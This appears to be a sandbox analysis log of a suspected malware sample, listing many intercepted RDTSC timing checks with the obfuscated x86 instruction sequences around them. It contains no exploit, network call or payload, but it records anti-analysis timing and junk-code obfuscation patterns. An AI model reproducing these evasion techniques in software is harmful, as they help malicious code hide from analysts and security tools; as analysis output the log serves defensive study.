Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1227C6F second address: 1227C75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1227C75 second address: 1227C8F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F39A52A2E58h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007F39A52A2E58h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1227D10 second address: 1227D15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1227D15 second address: 1227D24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1227D24 second address: 1227D36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A77CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1227D36 second address: 1227D7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A2E5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b jmp 00007F39A52A2E68h 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 mov ecx, dword ptr [ebp+122D3AE6h] 0x00000019 pop ecx 0x0000001a push 740535BDh 0x0000001f pushad 0x00000020 push ecx 0x00000021 push eax 0x00000022 pop eax 0x00000023 pop ecx 0x00000024 je 00007F39A52A2E5Ch 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1227D7E second address: 1227E23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xor dword ptr [esp], 7405353Dh 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F39A52A77C8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 mov esi, 494E1400h 0x0000002b cmc 0x0000002c sub dword ptr [ebp+122D2AFAh], edx 0x00000032 push 00000003h 0x00000034 call 00007F39A52A77D7h 0x00000039 mov edx, dword ptr [ebp+122D17E8h] 0x0000003f pop edi 0x00000040 push 00000000h 0x00000042 mov dword ptr [ebp+122D1800h], ebx 0x00000048 push 00000003h 0x0000004a push BB796F9Ch 0x0000004f pushad 0x00000050 pushad 0x00000051 push eax 0x00000052 pop eax 0x00000053 jmp 00007F39A52A77D5h 0x00000058 popad 0x00000059 pushad 0x0000005a push edi 0x0000005b pop edi 0x0000005c pushad 0x0000005d popad 0x0000005e popad 0x0000005f popad 0x00000060 add dword ptr [esp], 04869064h 0x00000067 mov dx, 1BB1h 0x0000006b lea ebx, dword ptr [ebp+12459B92h] 0x00000071 mov esi, 5AB0FF93h 0x00000076 push eax 0x00000077 jbe 00007F39A52A77CEh 0x0000007d push ecx 0x0000007e push eax 0x0000007f push edx 0x00000080 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1227E53 second address: 1227F03 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F39A52A2E58h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F39A52A2E62h 0x00000011 jmp 00007F39A52A2E65h 0x00000016 popad 0x00000017 nop 0x00000018 jg 00007F39A52A2E5Ch 0x0000001e push 00000000h 0x00000020 sub cx, 6C27h 0x00000025 push 42A11B84h 0x0000002a push edi 0x0000002b push esi 0x0000002c jmp 00007F39A52A2E66h 0x00000031 pop esi 0x00000032 pop edi 0x00000033 xor dword ptr [esp], 42A11B04h 0x0000003a mov dword ptr [ebp+122D3108h], edi 0x00000040 push 00000003h 0x00000042 push 00000000h 0x00000044 push edx 0x00000045 call 00007F39A52A2E58h 0x0000004a pop edx 0x0000004b mov dword ptr [esp+04h], edx 0x0000004f add dword ptr [esp+04h], 00000016h 0x00000057 inc edx 0x00000058 push edx 0x00000059 ret 0x0000005a pop edx 0x0000005b ret 0x0000005c push 00000000h 0x0000005e mov ecx, dword ptr [ebp+122D2485h] 0x00000064 push 00000003h 0x00000066 mov ecx, dword ptr [ebp+122D3A06h] 0x0000006c push 8BD36425h 0x00000071 pushad 0x00000072 push eax 0x00000073 push edx 0x00000074 push esi 0x00000075 pop esi 0x00000076 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1227F03 second address: 1227F07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1227F07 second address: 1227F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007F39A52A2E56h 0x0000000d jmp 00007F39A52A2E5Dh 0x00000012 popad 0x00000013 popad 0x00000014 xor dword ptr [esp], 4BD36425h 0x0000001b adc dl, 00000029h 0x0000001e lea ebx, dword ptr [ebp+12459B9Bh] 0x00000024 jng 00007F39A52A2E5Ch 0x0000002a sub edx, 72C6C152h 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F39A52A2E62h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1227FF7 second address: 122808A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 xor dword ptr [esp], 27A43B1Ah 0x0000000e call 00007F39A52A77D9h 0x00000013 mov dx, EDADh 0x00000017 pop edx 0x00000018 push 00000003h 0x0000001a mov ecx, dword ptr [ebp+122D3B4Ah] 0x00000020 push 00000000h 0x00000022 jng 00007F39A52A77CFh 0x00000028 pushad 0x00000029 clc 0x0000002a add edi, 562BB630h 0x00000030 popad 0x00000031 add esi, 23836840h 0x00000037 push 00000003h 0x00000039 push 00000000h 0x0000003b push ebx 0x0000003c call 00007F39A52A77C8h 0x00000041 pop ebx 0x00000042 mov dword ptr [esp+04h], ebx 0x00000046 add dword ptr [esp+04h], 00000018h 0x0000004e inc ebx 0x0000004f push ebx 0x00000050 ret 0x00000051 pop ebx 0x00000052 ret 0x00000053 mov dword ptr [ebp+122D27BCh], ebx 0x00000059 call 00007F39A52A77C9h 0x0000005e push ecx 0x0000005f push ecx 0x00000060 jl 00007F39A52A77C6h 0x00000066 pop ecx 0x00000067 pop ecx 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c pushad 0x0000006d popad 0x0000006e ja 00007F39A52A77C6h 0x00000074 popad 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122808A second address: 12280A4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F39A52A2E58h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jbe 00007F39A52A2E71h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12280A4 second address: 12280A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12280A8 second address: 12280ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A2E5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c pushad 0x0000000d jnc 00007F39A52A2E56h 0x00000013 jmp 00007F39A52A2E69h 0x00000018 popad 0x00000019 push ecx 0x0000001a push esi 0x0000001b pop esi 0x0000001c pop ecx 0x0000001d popad 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push edi 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12280ED second address: 12280F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12280F1 second address: 1228156 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F39A52A2E58h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 and edx, dword ptr [ebp+122D1C86h] 0x00000028 mov dword ptr [ebp+122D24BCh], ecx 0x0000002e lea ebx, dword ptr [ebp+12459BA6h] 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007F39A52A2E58h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e mov edi, 715A3F84h 0x00000053 push eax 0x00000054 pushad 0x00000055 je 00007F39A52A2E58h 0x0000005b pushad 0x0000005c popad 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124747C second address: 1247482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1247482 second address: 124748C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12475F7 second address: 1247608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F39A52A77CDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1247608 second address: 124762C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F39A52A2E56h 0x0000000e jmp 00007F39A52A2E66h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124779D second address: 12477A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12477A3 second address: 12477BD instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F39A52A2E56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F39A52A2E5Bh 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12477BD second address: 12477D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F39A52A77CFh 0x00000009 pop ecx 0x0000000a popad 0x0000000b push edi 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1247A33 second address: 1247A42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F39A52A2E5Ah 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1247D6F second address: 1247D76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1247FC8 second address: 1247FCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1247FCC second address: 1248002 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F39A52A77F8h 0x0000000e pushad 0x0000000f jmp 00007F39A52A77D8h 0x00000014 jnc 00007F39A52A77C6h 0x0000001a popad 0x0000001b jl 00007F39A52A77D2h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1248002 second address: 1248008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1248307 second address: 124830C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124830C second address: 1248312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1248312 second address: 1248316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1248316 second address: 124831A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1248980 second address: 1248984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1248984 second address: 12489A2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F39A52A2E62h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jns 00007F39A52A2E56h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1248BF6 second address: 1248C69 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F39A52A77C6h 0x00000008 jng 00007F39A52A77C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F39A52A77D2h 0x00000015 jc 00007F39A52A77DFh 0x0000001b jmp 00007F39A52A77D9h 0x00000020 jl 00007F39A52A77E2h 0x00000026 jmp 00007F39A52A77CEh 0x0000002b jmp 00007F39A52A77CEh 0x00000030 popad 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 jbe 00007F39A52A77C6h 0x0000003a ja 00007F39A52A77C6h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1248C69 second address: 1248C76 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F39A52A2E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1248C76 second address: 1248C7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1248DE8 second address: 1248E08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 jmp 00007F39A52A2E5Ch 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F39A52A2E5Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124C28B second address: 124C28F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124C55A second address: 124C55E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124C55E second address: 124C562 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124D833 second address: 124D84F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A2E62h 0x00000007 jne 00007F39A52A2E56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1212B8C second address: 1212BA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007F39A52A77CDh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1212BA1 second address: 1212BB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F39A52A2E56h 0x0000000a jl 00007F39A52A2E56h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1212BB2 second address: 1212BB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1212BB8 second address: 1212BBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1212BBE second address: 1212BD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F39A52A77CEh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120DA6F second address: 120DA8F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F39A52A2E64h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125670B second address: 125672A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 js 00007F39A52A77C6h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jnl 00007F39A52A77CAh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125672A second address: 125672F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125672F second address: 1256735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125686D second address: 125688A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F39A52A2E63h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1256B5D second address: 1256B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F39A52A77C6h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F39A52A77CBh 0x00000011 push edi 0x00000012 pop edi 0x00000013 pushad 0x00000014 popad 0x00000015 jnp 00007F39A52A77C6h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1256B7F second address: 1256B84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1256E01 second address: 1256E14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F39A52A77C6h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F39A52A77C6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1256E14 second address: 1256E1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1259055 second address: 1259059 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1259059 second address: 1259062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1259062 second address: 1259096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F39A52A77D9h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F39A52A77CFh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1259605 second address: 1259609 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1259D18 second address: 1259D23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F39A52A77C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1259EB4 second address: 1259EBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1259F86 second address: 1259F8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125A06F second address: 125A073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125A44E second address: 125A452 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125A452 second address: 125A458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125A458 second address: 125A4C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F39A52A77C8h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 mov dword ptr [ebp+122D1843h], ebx 0x0000002b call 00007F39A52A77D0h 0x00000030 add si, A124h 0x00000035 pop esi 0x00000036 mov edi, dword ptr [ebp+1245BA2Ch] 0x0000003c xchg eax, ebx 0x0000003d jmp 00007F39A52A77D8h 0x00000042 push eax 0x00000043 pushad 0x00000044 push edi 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125B3F4 second address: 125B3FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F39A52A2E56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125B3FE second address: 125B402 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125B402 second address: 125B47D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F39A52A2E58h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 or esi, dword ptr [ebp+12457686h] 0x0000002b push 00000000h 0x0000002d sub dword ptr [ebp+124844C6h], edi 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007F39A52A2E58h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 00000014h 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f mov esi, dword ptr [ebp+1245AD8Dh] 0x00000055 xchg eax, ebx 0x00000056 pushad 0x00000057 jmp 00007F39A52A2E61h 0x0000005c pushad 0x0000005d jnl 00007F39A52A2E56h 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125B47D second address: 125B489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125B489 second address: 125B48D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125B48D second address: 125B4A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A77CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125DC63 second address: 125DC67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125E706 second address: 125E70C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125E70C second address: 125E710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125E7B4 second address: 125E7B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
